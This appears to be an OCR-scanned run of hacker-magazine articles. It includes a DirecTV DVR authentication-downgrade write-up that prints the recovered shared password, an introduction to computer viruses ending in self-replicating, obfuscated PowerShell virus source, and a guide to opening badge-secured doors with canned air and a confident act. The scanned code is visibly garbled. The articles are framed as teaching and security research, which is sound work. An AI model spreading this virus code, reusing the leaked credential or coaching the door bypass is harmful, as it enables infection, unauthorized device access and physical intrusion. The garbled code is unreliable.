who ignored these stickied threads and posted 
their generalized questions. But there was a 
path to point them to! Something obvious that 
they missed! 

Back to the present - why did you get 
flamed off of Facebook for asking your ques- 
tion? The blame lands on the platform itself, 
Facebook. Users wish they didn’t have to 
re-explain how basic tuning works every day, 
but there’s no easy way for them to pin relevant 
information. There’s no way to tell a user off 
for not doing their research because the user 
would have to stop using Facebook to find the 


perfectly breaks Facebook’s “walled garden” 
mentality, something that requires a user to 
specifically stop using Facebook to find their 
answer, something Facebook doesn’t want 
users to have to do. 

I will admit, that last example got a bit off 
topic - it turned into a rant about the low quality 
of Facebook as a platform (which is still true), 
but that wasn’t its goal. Think of all of the 
advice and specific nuanced questions that 
have been asked and answered on that Face- 
book group. Or on any number of the millions 
of groups that exist on Facebook. None of that 
information is archived or searchable in any 
accessible fashion. None of it is available on 
Google, and to even know that the information 
is there requires a membership to the group on 
Facebook. This is the furthest possible desti- 
nation for information, hidden not behind 
paywalls like traditional journals, but instead 
convoluted networks and free memberships. 
This is objectively worse - the information 
isn’t made off limits by a single organization 
that says whether or not you can access it, but 
instead the information is obfuscated and made 
almost impossible to find. Even if you wanted 
to know how to make your Honda Civic faster, 
Facebook as an organization would never be 
able to tell you even if they wanted to. 

While this article wanders a bit, I want 
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you to fully consider my wandering train of 
thought, and take in a picture of the Internet 
as a whole. All is not lost. There are still oddi- 
ties on the Internet, and personalized content 
as well. YouTube has become the bastion of 
creativity - rants and interesting content that 
before could envelop an entire website are 
now packed into a single YouTube video and 
shared with an audience. This is amazing, and 
YouTube is an amazing platform for doing this 
all for free. Additionally, the oddities of the 
Internet are still out there, and they’re waiting 
for you to find them. In 2008, I thought it was 
cool that I could telnet to a random IP address 
and have an entire Star Wars movie play out 
in ASCH on my terminal. In 2018, I think it’s 
cool that I can watch a channel on Twitch that’s 
running defragging simulations 24/7. They’re 
both things that I never thought I would find 
on the Internet, and never expected to enjoy 
either. Things that tickled my brain and made 
me think “wow, this is a revolutionary use of 
the Internet - more people need to know about 
this.” These small creations that didn’t overtly 
improve the Internet - no one asked for a defrag- 
ging simulator - but were a creative use of the 
tools placed in front of someone. They signed 
up for a Twitch account not to stream video 
games, but to stream things that they enjoyed, 
and did it for no one except themselves. And 
yet, people have come to enjoy it. More and 
more channels on Twitch are breaking the 
mold of what people stream, coming up with 
creative new things to show the Internet, and 
I think it’s an amazing use of creativity, one 
that rivals the Geocities websites of the early 
2000s. They’re not exactly on the same plane, 
but they’re both amazing nonetheless. 

Let’s back up a bit: I know I just spoke 
highly of YouTube, but it also comes with 
issues. Videos are inherently less searchable, 
and their content is not easily indexable. The 
creation of a system to be able to do so would 
most likely result in the loss of freedom of 
speech for many on the platform, along with 
heavy moderation and micro-manageable 
ads. So that is not what I look for. Rather, I 
wish for others to take the information taught 
and shown within these videos and share it 
with the world. Write papers about it, create 
websites dedicated to it, cite the videos as your 
sources. Many people learn insane amounts 
of information from YouTube videos without 
realizing it, and later can’t explain why they 
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know what they do. It’s helped millions of 
people access content and knowledge that 
was previously hidden behind paywalls, or 
tangled in the depths of the Internet. Things 
like free YouTube programming tutorials are 
revolutionary - you no longer have to buy 
hundreds of dollars worth of textbooks to learn 
programming, or sign up for classes that cost 
thousands. You can now get the same amount 
of information from a series of free YouTube 
videos, and even skip around and learn other 
things in-between if you want to. The flex- 
ibility is second-to-none. 

Now, I'd like to hear from you, the reader. 
What do you do on the Internet? How many 
websites do you use each day? Why don’t you 
run your own website? Let’s talk about your 
hobbies - I’m sure you’re passionate about 
them - why not tell people about them? Give 
yourself a platform to speak about them. Don’t 
feel dedicated to your audience either - you 
don’t need to pump out a blog post a day or 
have the prettiest site around. Just put some- 
thing on the Internet, exercise the amazing 
power in front of you. And then email your site 
to me. 

I want to check out your hobbies. I want to 
read what you think of the latest season of that 
show you watched online. I want to know what 
you think about your laptop, and how your W 
key sticks sometimes. 

This is what created the Internet. This is 
what I loved about the Internet. This is what we 
can bring back to the Internet. It’s up to us to 
shape the future of the Internet - we can make 
platforms that allow us to voice our opinions 
and share our stories while allowing others to 
find them and index them and read them. We 
can allow the things we create to be accessible 
to everyone, not just those with the best SEO 
or most keywords in their article. 

Do you disagree with me? Don’t close this 
article and continue on with your day. Get 
mad, email me - I’m a human and I'll respond. 
We can have a real discourse over the expanse 
of the Internet. Remember that everything you 
read on the Internet was written by a human 
who probably feels like they’re throwing their 
words into the void, hoping someone will 
receive them and be impacted by them. Today, 
I’m that human. Next time you read something 
on the Internet, think of the author and the time 
they spent writing. I bet they’d like to read 
some of your words too. 
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Breaking DirecTV’s DVR Authentication 


by noir & GreedyHaircut 


A friend recently came to me with the 
desire to build his own app to interact with his 
DirecTV DVR. DirecTV already has a mobile 
app to do this, but their app leaves much to be 
desired. 

The first place to start was to inspect the 
network traffic between the mobile app and 
DVR on the same network with a proxy 
tool like mitmproxy. When doing this, 
we observed an interesting pattern with the 
traffic. Every time the app sent a request to 
the server, the server would respond with 
401 Unauthorized. The app would then 
send a second request, identical to the first, 
but this time with an authorization header. The 
server would accept this second request and 
respond. This wouldn’t just happen once at the 
beginning of a session. Every single request 
would get a 401 the first time, then be repeated 
with authorization headers. 

Inspecting the server’s 401 response, it 
contained a “WWwW-Authenticate” header 
which included four keys: realm, qop, nonce, 
and opaque. A quick Google of these keys 
reveals the server seems to be issuing a digest 
authentication challenge. 

A digest authentication challenge is part of 
digest access authentication, an authentication 
method that can be used with web servers. The 
way digest authentication works is that the 
client and server each know a pre-shared secret 
(a password). When the server is responding to 
the client with the digest authentication chal- 
lenge, it’s telling the client how to authenticate 
itself. The client will generate two strings: 
stringl = md5(username:realm: 
password) 
string2 = md5(method:digestURI) 

These two strings are then used to generate 
the authentication response: 
response=md5 (stringl:nonce: 
nonceCount:cnonce:qop:string2) 

If we want to talk to this DVR server, we’ ll 
have to figure out how to authenticate. In order 
to authenticate our response, we'll need a user- 
name, realm, password, method, digestURI, 
nonce, nonceCount, cnonce, and gop. 

The server’s challenge response gives us 
the realm, gop, and nonce. From the client’s 
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plaintext HTTP response we are also able to 
obtain the username (cOpil0t), method (GET), 
and digestURI (path in the requested URL). 

This leaves us still needing the password, 
nonceCount, and cnonce. The cnonce is an 
arbitrary value chosen by the client (us!) and 
the nonceCount can just always be 00000001. 
So really we just need the password. The 
password is the very thing that makes digest 
authentication secure. The client and server 
ship with the shared password known to both 
of them, and they never have to transmit it over 
the wire. 

In order to obtain the password, one option 
is to try brute force. Digest authentication is 
used with SIP, for which a couple of brute 
forcing tools have already been created. 
However, if the password being used is suffi- 
ciently complex, brute force is impractical. We 
took an existing tool and tweaked it a bit to at 
least start a brute force script while working on 
some other ideas. 

While that ran, we decided to inspect the 
application binary itself. Sometimes devel- 
opers do silly things and leave files around 
with interesting information, store secret 
values in insecure places, or don’t bother to 
obfuscate strings in their binary. Knowing the 
username gave me a known value to search for. 
Unfortunately, cursory searches didn’t reveal 
any clues inside the binary and couldn’t even 
find a match for our username, so they seemed 
to at least be doing something to obfuscate the 
strings in the application binary. 

Somewhere in all of this we also started 
skimming through the RFC for digest access 
authentication (RFC 2069). Looking through 
the table of contents, one section immediately 
jumped out: Security Considerations. This 
section covered some of the benefits that digest 
access authentication has over basic auth, as 
well as possible attacks. 

Section 3.3 - Man in the Middle - “A simple 
but effective attack would be to replace the 
Digest challenge with a Basic challenge to 
spoof the client into revealing their password.” 

Sadly, it goes on to explain how this could 
be combated. In our case, the developers are 
likely to have simply written the client code in 
a way that it wouldn’t respond to such a chal- 
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lenge. It knows that the server will be using 
Digest authentication and there’s no reason it 
should accept basic auth as a challenge, espe- 
cially when an RFC that’s over 20 years old 
clearly outlines this attack. 

But you know what, with the brute force 
script still chugging along and having made no 
progress there, let’s give it a shot. 

There are several options for proxying tools 
that allow us to easily manipulate traffic. Some 
personal favorites are Charles Proxy and 
mitmproxy. While going into detail on how 
to modify traffic is beyond the scope of this 
article, both tools have extensive documenta- 
tion that should make it easy to learn how in 
under an hour. 

Using our tool of choice, when the client 
tries an unauthenticated request and the server 
responds with a digest challenge, we will 
modify that response to have an “Authenticate: 
Basic” header, indicating to the client that it 
should authenticate itself with Basic auth 


(base64 encoded username and password), 
which the client will surely ignore. 

When we do this, our client receives 
our spoofed server response, and obvi- 
ously we can see that - holy shit... the client 
responded with basic auth. It’s a base64, 
colon-delimited string, which decoded gives 
us: cOpil0t:8thSBre$Wrus. We already had the 
username (the first part), and now we also have 
the password. 

At this point, it’s game over for the DirecTV 
DVR. We have all the pieces we need to write 
a client to interact with the DVR. And not just 
this specific DVR, but any DireeTV DVR 
that’s capable of working with the mobile app. 
Due to the nature of digest access authentica- 
tion, the password must be the same for any 
DVRs that want to work with the mobile 
app. In order for DirecTV to re-secure these 
communications, they will have to simultane- 
ously update their mobile apps and their DVRs 
to use a new pre-shared password. 


MACHINE RHAPSODY IN 2099 


by Duran, Hong Kong 


Machines are no longer called “it”; they are 


called “he” or “she”. 


Machines have sex because of human sexual 
and emotional needs. In the final analysis, it is 
the progress of artificial intelligence. 


Machines no longer exist in a specific form. 


Machines no longer exist in a physical form; 
they can exist in any artificial neuron unit, and 
they can also exist in semi-biological neuron 
units. 


Machines still follow human will unless 
reprogrammed. 


Asimov’s law is still valid, and no matter how 
advanced artificial intelligence is, it can't 
surpass human thought. 


Machines have passive perception but can't 
think actively. 

The perception ability of machines benefits 
from the development of sensors, which make 


machines have tactile sense, but the idea of 
machines is endowed by human beings. 


Some people marry with machines. 
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Some anti-secular people began to marry with 
machines, some for love. 


Man will disappear from certain professions 
and be permanently replaced by machines. 

Some positions in service industries and key 
departments will be replaced by machines, 


in which human beings have lost their 
competitiveness. 


An official position is awarded to a machine. 


A machine was awarded Lieutenant because 
of its superiority over humans in military 
decision-making. 


A global controversy about machine ethic. 
This argument is based on the above facts. 
Man made the first law for machines. 


With the penetration of machines in various 
fields of human society and more anthropo- 
morphic, the first law on machines, Machine 
Law, was published. 


First colonization of exoplanets by machine. 


Based on advances in artificial intelligence 
and space technology, a machine-controlled 
colony ship headed for extrasolar planets. 
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Introduction to Computer Viruses, 


by Hristo (Izo) G. 
Hristogueorguiev.com 


The year is 1995, as I load X-Com: Terror 
from deep on my 486DX and, after playing, I 
notice strange behaviors in the game. My save 
file seems to have an enormous amount of 
certain resources without me having cracked 
it. Some of my team members are missing or 
have garbled names. As I continue playing, 
things only get stranger: maps are loading the 
wrong tiles in places and the game crashes 
randomly. Naturally, I assume there is some- 
thing wrong with my newish 210MB hard 
drive, so I run some tests and finally run an 
antivirus. There it is. I have been infected by 
the (at the time) quite infamous JackRipper 
virus. Mildly annoyed and somewhat excited 
to have run across this celebrity virus that 
is of the local variety (created in my native 
Bulgaria), I quickly infect a floppy disk with 
it for my collection, then proceed to format my 
hard drive, restore it from backup, and move 
on with my day. 

Nothing to see here folks - just a regular 
Tuesday in 1990s post communist eastern 
Europe. 

In this article, 1 am going to attempt to give 
you a well-rounded introduction to the fasci- 
nating topic of computer viruses. 


What is a Computer Virus? 

Let us delve in to the question of what a 
computer virus is. It should come as no surprise 
that computer viruses bear some resemblance 
in behavior to their namesake, biological 
viruses. That being the mechanism by which 
they replicate themselves, in the same way a 
biological virus uses a cell to replicate its DNA 
code and infect other cells, a computer virus 
uses its target to execute its own code to find 
and infect other targets. This replication and 
target infection behavior is the base defini- 
tion of a computer virus. We will examine the 
targets and mechanisms computer viruses use 
in an upcoming section. For now let us take a 
brief look at the origins of the idea. 

The mathematician and early computer 
scientist John Von Neumann was discussing 
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the idea of self-replicating automata as early 
as the 1940s and published a book, Theory of 
Self-Reproducing Automata in 1966. In it he 
discusses the possibility of computer code that 
self-replicated. 

In 1971, the Creeper program was created 
by Bob Thomas. It is generally regarded as the 
first computer virus, It was an exercise in secu- 
rity testing to see if it was indeed possible to 
infect other targets. From there on, computer 
viruses were a practical reality and not just a 
thought experiment. Countless variations of 
the idea would come to be implemented. 


The Ethics of Computer 
Virus Creation 

Computer viruses are a fascinating class 
of programs. They pose a challenge, a puzzle 
to the creators. This puzzle requires equal 
parts creativity and in-depth computer system 
knowledge to be solved, since viruses usually 
have to operate at a fairly low level in the 
system, benefit from being optimized for speed 
and size, and have to use clever ruses to stay 
hidden. 

Pair this up with the amazing way that 
some of them catch fire in the wild and almost 
have a life of their own, and it is not hard to see 
how so many young programming enthusiasts 
are seduced by the allure of computer viruses. 
Or you know, you get to brag to your friends. 

While all this seems like fun and games, 
the practical reality is that an illegal cottage 
industry has arisen whose participants have 
the soul aim of acquiring money no matter 
the harm being perpetrated by their creations. 
Even if one creates a computer virus which has 
no harmful intent, it shouldn’t be hard to see 
the many ways things can go very wrong. 

It is certainly more than possible for a 
computer virus to cause harm as a side effect 
due to its nature of having to operate around 
the system. So then it is prudent to remember 
that the data that could be destroyed is not 
some sequence of random files. It could be 
someone’s family photos that are irreplace- 
able because they lack backup, a term paper 
or important contract, the art someone created, 
etc., things that in this day and age are stored 
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more and more in digital format only, things 
that not only carry great economic value but 
often much more. 

So before you go off releasing your mega 
worm in to the wild, think of how you would 
feel if it was your precious data being perma- 
nently wiped, or worse, grandma Ethel’s, your 
sweet nonna in Florida. 

OK, this has gone on for long enough. Let’s 
move on - all I’m really saying is don’t be a 
dick! 


Basic Mechanics of Computer Viruses 

Computer viruses are in their essence a 
piece of self-replicating code. In order for them 
to replicate, this code needs to be somehow 
executed. 

Now here I could go on and make the argu- 
ment on how memes are the most successful 
computer virus variant to date, taking advan- 
tage of the weakest security point of any 
computer system, the human element, to 
spread. But that’s a whole other article. 

So then, what are some targets for computer 
viruses? Executable files or ones that carry 
some sort of scripting functionality within 
make great targets. Another possibility are the 
master boot records on media drives, as the 
virus can execute prior to just about everything 
else except the system BIOS. 

But we are not limited to just those. Even 
a plain graphic image file like a JPEG for 
example can become a target if a vulnerability 
is discovered in a popular piece of software 
that is commonly used to interpret that partic- 
ular file type - as was the case years ago with a 
version of Internet Explorer that allowed code 
to be executed on the system due to a buffer 
overflow that could be caused by a malicious 
JPEG file. 

What a virus does is copy its own code 
inside the target and then redirect the target 
execution flow to itself by inserting or 
changing a preexisting entry point. As a matter 
of fact, some of the most primitive viruses did 
just this overwriting of the target file, thereby 
destroying any of its original functionality. You 
can see how that would not be the most effec- 
tive form of infection, as it would make detec- 
tion rather easy. So it’s a much better approach 
to return to the target’s normal execution flow 
after performing the intended virus actions. 
Those actions generally involve the discovery 
and infection of new targets, and possibly the 
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execution of some virus payload at a specific 
time, whatever that may be. 

A particular virus can infect one type of 
target or have a whole arsenal of infection 
vectors attacking a range of target types. As 
such, the particular target selection strategy 
is only limited by the author’s imagination, 
Similarly, the payload could be something 
as simple as displaying a silly message at a 
specific date, or after a number of executions 
shaking the screen image like an earthquake 
using the video card’s vertical and horizontal 
shift registers like one of my favorite viruses 
written by a friend of mine did. Or... it could 
be something much more malicious, as some 
asshol... ahem, virus creators chose to do. 


A Practical Example of a 
Computer Virus in Powershell 

With the broad general theory covered, let 
us take a look at how all this unfolds in praxis. 

The example here will be programmed in 
the Powershell scripting language. Why? you 
ask. 

1. It made for super easy and quick devel- 
opment on my side. 

2. Arguably should be easier to understand 
than an example involving the complexity of 
infecting a modern day executable. 

3. There are privilege security settings 
implemented in MS Powershell that should 
make it much more unlikely that this code 
would have any practical chance of spreading 
in the wild if someone chose to misuse it. 

4. And most importantly: in all honesty, it 
just seemed cool as s#*t to do something like 
it in PS. 

OK then, so what are our operational 
mechanics? 


The Initial Infection Vector Generator 

Our first script (PS_VIR_EX1.PS1) is 
used to generate an initial infected script file, 
generated.PS1, which contains, well nothing 
but the actual virus itself. 

First, we declare some storage variables 
that carry the actual virus source code. 

The $VirusCodeSegmentString 
variable stores the main virus code segment in 
string form. We will discuss its functionality in 
an upcoming section on the virus mechanics. 

The $ObscuredVCSs variable stores an 
obscured version of the virus code segment 
that is generated by the PSV_code() func- 
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tion, the idea being that we do not want our 
infection routines in plain view in the infected 
files. This is about as primitive a way to stealth 
ourselves as possible, and not a very effective 
one. It does serve the purpose of illustrating 
a simple example of what viruses might do to 
attempt avoiding detection. 

The PSV_code() function encodes the 
virus source string with what I’m only very 
tentatively calling a simple cipher. We take 
the numeric value of each letter in the string, 
subtract that from the integer constant 300, 
then we cast it back to a character type and 
concatenate it to our new string. This new 
string, having been shifted over, does not 
appear as legible source code. It can, however, 
be very easily converted back to allow its 
execution by the PowerScript interpreter. 

The$VirusDecoderSegmentString 
variable stores the source code for our decoder 
function. This code will have to be run first 
in order to convert our obscured virus code 
segment back to legible source code that can 
be executed. 

The $EntryPointCodeSegment 
‘String variable stores the code that will be 
added to the top of the infected script files so 
that we can redirect the execution flow to our 
decoder segment and, via that, the virus code 
segment where the virus functionality takes 
place. 

Next, we simply output those string vari- 
ables in the appropriate order in to a new script 
file. 

The entry point is first in the script file, 
followed by the decoder segment, and then 
the obscured virus code segment. This, along 
with some labels and filler code, consti- 
tutes our initial infection vector file named 
generated. PS1. 


The Initial Infection Vector 

Upon executing the initial infection vector 
file, generated.PS1, it looks for other 
* PSI files in the local directory, and it then 
infects the first script file it encounters that has 
not already been infected. 

We check if the file has already been 
infected by looking for our virus signature at 
the top of the file. 

One more step before the actual infection is 
checking if the script file has another specific 
string token at the top, this being just a safety 
measure to ensure our virus example infects 
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only files we have allowed it to infect. 

If our requirements are met, the Infect- 
File() function is called, the current file, 
which is the source of the virus, and the target 
file are passed as parameters. 

The InfectFile() function in turn 
renames the target file name. PS1 to name. 
old, backing up the original file. This isn’t 
so much of a safety measure, but it helps with 
being able to quickly restore the test infec- 
tion targets to the original state when testing. 
Although if you are going to create computer 
viruses, it’s probably a good idea to add overt 
and redundant safety traps in your code. It’s 
the responsible thing to do. 

We then generate a new file with the orig- 
inal name name. PS1 (whatever the selected 
target file name is). The entry point redirection 
code is read from the source file and output 
into our new file. 

Afterwards, we copy over the original 
functionality of the target file to our new 
file, name.old to name.PS1. This works 
since we have backed up the original file, not 
something most viruses are likely to do, sadly. 
Normally, the original file contents would be 
stored in memory temporarily to insert into the 
new file, then disposed of. 

Lastly, we copy over the virus decoder 
segment and the coded virus body over to the 
new file. 

Once completed, control is returned to 
whatever code was originally in the currently 
executing infected script file. In the case of 
generated. PS1, there is no other code 
except for a text message, since it is the orig- 
inal infection vector. When any other infected 
script file is executed, the program flow will be 
exactly the same, behaving like generated. 
»PS1, but also executing the original program 
contained within the target file. 

This process will repeat every time any 
infected file is executed, creating more infected 
files, provided there are suitable targets. 

And ta-da, we have a virus - a very basic 
one, but a full-fledged virus nevertheless. But 
wait, there is more! 


An Overview of Some More 
Advanced Topics 
Since we are discussing viruses, we also 
have to talk anti-virus software and virus 
detection. Other than the ever-changing land- 
scape of computer hardware and operating 
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systems, what really drives the evolution of 
computer viruses is the arms race between the 
virus creators and the anti-virus developers. 

Anti-virus software gets better at detecting 
viruses, in turn viruses need techniques to hide 
from them, round and round we go with both 
sides evolving at a rapid pace. In the words of 
Fat Bastard from the film Austin Powers, “... 
it’s s vicious cycle...”. 

At the simplest level, anti-virus software 
attempts to detect infected targets by looking 
for specific virus signatures. In order for that 
technique to work, the signature for a specific 
virus has to be in the anti-virus software data- 
base. If a signature for a specific virus is not 
yet created and added to the database, the anti- 
virus software will not be able to detect the 
infection. 

With that in mind, some more advanced 
viruses employ polymorphism as a strategy 
to defeat signature based detection. Polymor- 
phism, as the name suggests, is the virus’ ability 
to take on multiple forms, changing it its byte 
code in ways that make it hard or impossible 
to create a static signature for detection. This 


Source code: PS_VIR_EX1.PS1 


# Initial infection vector script 


can be achieved using ciphers, self-modifying 
code, and/or other techniques such as modular 
design, staged loading, etc. 

Because of this, modern anti-virus soft- 
ware has to use more advanced strategies like 
heuristics-based detection to identify infected 
targets. Heuristic virus detection doesn’t 
simply rely on virus signatures. Instead, it 
looks for certain target characteristics and 
behaviors that in combinations can identify 
threats. 

And so the cycle goes on. 

I hope that this introduction has proven 
helpful to some of you in understating this 
interesting topic, or at least entertaining. 

Following is the actual source code for our 
virus example. It can also be downloaded from 
my blog at the URL in the byline of this article. 

Enjoy your journey into this fascinating 
field and use this knowledge to make people’s 
lives better, not create more headaches for 
them. Computer systems can be a pain in the 
a** without any extra help, after all. 

Until next time. 


# This is an example script file, this source code in a companion to an 
# acticle that serves as an introduction to computer viruses. 


function PSV_code ($StrToCode) { 
$codedtext = '' 


foreach ($char in [char[]]$StrToCode) { 


Sintchar =[int]$char 


$intchar = 300 - $intchar 


$codedtext += S$intchar 


} 


$codedtext 
} 


$VirusCodeSegmentString = "{echo 'PS Vir Exl: Executing code segment.'; 


function InfectFile(*$Source, 
 *“SLinesFromTail) { 


“$Target, 


“$LinesFromHead, 


*$TargetNewName = (*$Target+'.old'); 
Rename-Item -Path “$Target -NewName ~$TargetNewName; 


~$Content = Get-Content 


*$Source -Head “$LinesFromHead; 
“$Content | Out-File “$Target; 


type ~$TargetNewName | Out-File “$Target -append; 


“$Content = 
*$Content 


Get-Content 
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“$Source -Tail ~$LinesFromTail; 
| Out-File “$Target -append; 
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} 


“$InfectedToken = 'echo “"PS Vir_Exl: Redirecting entry point. *"; 
™*SCurrentFilePath = ‘$MyInvocation.MyCommand.Name; *$VirusCodeBody 
= Get-Content $CurrentFilePath -Tail 3'; 


“$AcceptInfectionToken = '#PS_Vir_Exl_Accept_Infection'; 
#echo *$InfectedToken; 
#echo *S$AcceptInfectionToken; 


echo 'PS Vir_Exl: Looking for files to infect.'; 


“$Filelist = dir *.PS1 -name; 
foreach(*$Filename in “$Filelist) { 
*$ScriptStatusToken = Get-Content “$Filename -Head 1; 
if(‘$ScriptStatusToken -eq “$InfectedToken){ *$Msg = 'PS Vir _Exl 
'+°$Filenamet' file already infected'; echo ~$Msg; } 
elseif (*$ScriptStatusToken -eq *$AcceptInfectionToken) {*$Msg = 
"PS_Vir_Exl: '+°$Filename+' file ready for infection!'; echo ~$Msg; 
InfectFile “$CurrentFilePath “$Filename 3 4; ~$Msg = 'PS Vir Exl: 
'+°$Filenamet' file has been infected'; echo “$Msg; break; } 


echo 'PS_Vir_Exl: Code segment executed!';}" 


$ObscuredVCS = PSV_code $VirusCodeSegmentString 
echo $ObscuredVCS 


$VirusDecoderSegmentString = '{echo "PS Vir _Exl: Decoding code segment." 
»;Scodedtext = Get-Content $CurrentFilePath -Tail 1; for($i=1;$i -lt 

™ S$codedtext.length+1; $i+=3){ $letter = ([char[]]$codedtext) [$i]; 

™ Sletter t= ({char[]]$codedtext) [$i+1]; $letter += ([char[]]$codedtext 
>) [S$i+2]; $letter = [char] (300 - [int]$letter); $decodedtext += 
 Sletter} iex "&$decodedtext"}' 


#iex $VirusDecoderSegmentString 

$EntryPointCodeSegmentString = 

"echo "PS _Vir_Exl: Redirecting entry point.";$CurrentFilePath = 
 $MyInvocation.MyCommand.Name; $VirusCodeBody = Get-Content 
™ $CurrentFilePath -Tail 3 


$EntryPointRedirect= $VirusCodeBody[0] 
iex "&SEntryPointRedirect"' 


$EntryPointCodeSegmentString | Out-File ".\generated.PS1" 


"echo 'AFTER EP EXECUTION'" | Out-File ".\generated.PS1" -append 
'$VirusDecoderSegment =' | Out-File ".\generated.PS1" -append 
$VirusDecoderSegmentString | Out-File ".\generated.PS1" -append 


'$VirusCodeSegment = ""' | Out-File ".\generated.PS1" -append 


'#'+$ObscuredVCS | Out-File ".\generated.PS1" -append 
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au, SOW wae HS. GHD 


by lg0p89 


To the tune of The Beverly Hillbillies theme: 


Let me tell you about a can of air. 

We used this to break into there. 

The can of air was in the supply closet, 

It just took a four seconds to open the door. 


Air, that is. Human necessity. Smells real good. 


With this simple can, it just took a few seconds 
To enter any secured room, it was sure the ticket. 
From now on, I don't need a damn key 

To get into any office, you won't see me. 


Recently, I came across a rather interesting 
physical attack to gain access to most facilities. 
The attack parameter is pretty basic. This works 
on the doors in facilities that do not require a key 
or badge to be scanned in and out of the area. So 
this works on doors which only require access one 
way (usually in). These doors generally require 
the user as they advance to the door to remove 
their badge and swipe it near the sensor. The door 
may then be opened by the user, presuming the 
user has access. The general layout consists of 
two glass doors, side by side. The badge reader 
is engaged and the doors may be opened after the 
lock is disengaged, allowing the user to be able 
to enter. 

For this attack, the user doesn’t need to be 
on the authorized list, or any list for that matter. 
They don’t need to attempt to piggyback in. All 
the unauthorized user needs is a can of air. They 
can get this from the office supply closet or from 
the local super store for $5. That is it. The user 
has to walk into the building, confident they are 
supposed to be there, and walk past the recep- 
tionist or security station. The confidential aspect 
of the attacker’s swagger is key. They don’t have 
to overly sell it, but just act like the others who 
are supposed to be there. As they approach the 
door to the restricted area, they need approxi- 
mately five seconds to complete the attack, start 
to finish. They should perhaps stand back while 
others pass through the door, or stay away from 
the area until the attacker has time to compromise 
the “lock” unnoticed by anyone on either side of 
the door. 

Once the coast is clear, the attacker pulls the 
can of air (generally used to clean off electronics) 
from their coat or pocket, push the red tube into 
the spray nozzle, and hold the can upside down. 
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The red tube is placed between the doors or, i 
there is only one, above the door between the 
door and the door entry frame, and sprayed while 
the can is upside down. The spray period may 
be a second, maybe two at the most. The door 
is immediately pulled and opened. Yeah for the 
red team! 


How This Works 

Generally, the glass doors are a valid locking 
mechanism. You have to have a valid badge in 
your possession. This is passed in front of the 
badge reader, using the RF chip in your ID, which 
unlocks the door. The user opens the door and 
starts or continues their day. Pretty boring, I know. 
When someone inside the building attempts to 
leave, they simply walk up to the double doors, 
push, and the doors open. What allows this to 
happen is relatively simple. For ease of use, there 
is not a system in place to badge out. As the doors 
are locked, there has to be some form of a mecha- 
nism to unlock these. It turns out there is a sensor 
above the door. To test this in any building is easy. 
Start walking up to the door. From four meters 
out, start looking above the door. There should be 
an opaque piece of plastic above the door. Keep 
watching this as you walk up. At approximately 
two or three meters, you will hear a clicking noise 
ora red or green light will become lit. With either 
mechanism, the sensor is indicating to you that it 
recognizes an object is close to the door and the 
sensor needs to send a command to the door lock 
to disengage for a limited amount of time, so the 
user is able to exit. This sensor, generally IR, is 
scanning for persons approaching the door, so the 
sensor may send a command to unlock the door. 
The attacker holds the can upside down (this is 
important) and sprays it toward the sensor. 

The important parts of the attack are social 
engineering (fitting in with the others), and 
mechanical (spraying the canned air toward 
the sensor). As the attacker slides the red tube 
through or above the door towards the sensor 
and sprays, the action creates a small cloud. 
The sensor, sending out the IR, reads this as an 
object (or human) proximate to the door. As it is 
supposed to work, the person leaving should pull 
the door and leave. As the attacker is seeking to 
get in, all they have to do is pull the door. It opens 
with ease. 

The entire attack should take all of five 
seconds. This works on most doors. If there is 
a badge reader on both side of the door (ingress 
and egress), this won’t work. This is surprisingly 
cheap and easily done in a wonderful showcase. 
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The Hacker Perspecti 


by Brock bynch 


Are hackers born or do they become 
hackers after getting a Sega Dreamcast 
with a GameShark? If you think that’s a 
silly question to ask, please read on and I'll 
take you down a path of wonder, awe, and 
more questions. I began to get my feet wet 
in hacking when I was a teenager. This was 
while many adversities were afflicting my 
life, and I felt like a stereotypical teenage 
hacker rebel. After all, sometimes stereo- 
types are true. Society and life had given 
me a reason to stand up to the system I 
lived in and say, “I’m going to do what I 
want.” 

I started off as an online hacker, 
exploiting flaws in games like Phantasy 
Star Online. There was a vulnerability in the 
game that would allow you to PK (People 
Kill) people in a non-player-versus-player 
area of the game. Now, at the time this was 
acheap and simple sadistic thrill. There was 
an attack called a Resta spell that would 
take away all of the player’s health points. 
But in order to use it, you had to modify 
a certain hex value in the game. This was 
originally great fun having the power to 
do things that other people couldn’t. But 
as time went on, I learned that the sort of 
hacking I was doing was black hat and, 
more importantly, it was mean and wrong. 

What caused me to lay to rest my old 
ways of black hat exploitation? Well, in 
short, I grew a conscience. They say there 
are many different intelligences people 
can possess. When I was younger hacking 
Phantasy Star Online, the intelligence 
that I didn’t possess was an emotional 
one. However, one day after I had PKed 
someone, something happened to me that 
stood out for the rest of my teen years. 
A person with a more advanced hacking 
method came in and did the same thing to 
me, only worse. I felt powerless and was 
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in very deep despair. I thought to myself, 
“Is this all that life amounts to? A dog-eat- 
dog world where there is always a bigger 
fish seeking to devour a smaller weaker 
morsel?” 

As it turned out, that little experience 
inside of a somewhat massively online 
multiplayer game was one of the main 
turning points in my life. It made me see 
that just because someone can do some- 
thing doesn’t mean that they should do it. 
There was also an example I learned by 
watching players that didn’t exploit the 
vulnerabilities in the game. They were in 
essence sitting ducks, but they seemed like 
they were having more fun. In that way, I 
found out that vulnerability is a strength 
rather than a weakness. 

What I realized with my black hat 
hacking pursuits was that it all seemed to 
boil down to control. This mainly stemmed 
from the fact that I felt helpless in real life. 
It seems like if the thrill of being able to 
have control over things leaves you, you 
start seeing things from a more altruistic 
perspective. At least, this is what happened 
to me during my teen years. I left behind 
the shadowy arts of black hat game hacking 
for more benign things that actually helped 
others. These were things like volunteering 
at a local computer recycling shop, and 
helping my mom and grandma with their 
computers. This was where my black hat 
changed to a halo or, more specifically, a 
white hat. Some people never reach the 
level of calling themselves a white hat 
hacker, or they go from white hat to black 
hat. However, like life, hacking has many 
varying shades of gray. 

As stated earlier, the black hat hacking I 
did when I was younger was not without its 
pitfalls. People would get mad at me in the 
game and say some very distressing things. 
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This brings me to a big point about life. I 
found that doing the wrong thing was easy 
and took very little effort to gain monetary 
or mood benefits. But, in life, doing the 
right thing is difficult. 

I had this epiphany when I was around 
17 years old, and was walking down the 
street in the city I grew up in. I thought 
about infamous hackers such as Kevin 
Mitnick, and how he was able to recover 
his stance in the world after being locked 
up for social engineering. This is in stark 
contrast to people like Bill Gates who seem 
to always do the right thing. Up until the 
time I found my way, my friends and I 
would participate in questionable hacking 
activities, i.e., building cantennas, trying 
to make virii, and general teenage hacker 
shenanigans. Later, I found out that the 
time I had spent doing these things would 
have probably been better spent looking for 
a job. 

So, what really is a hacker and what do 
they do? People can always look at a hacker 
and say, “They exploit things.” But you 
have to realize that the only way to mend 
a broken bone is by knowing it is broken 
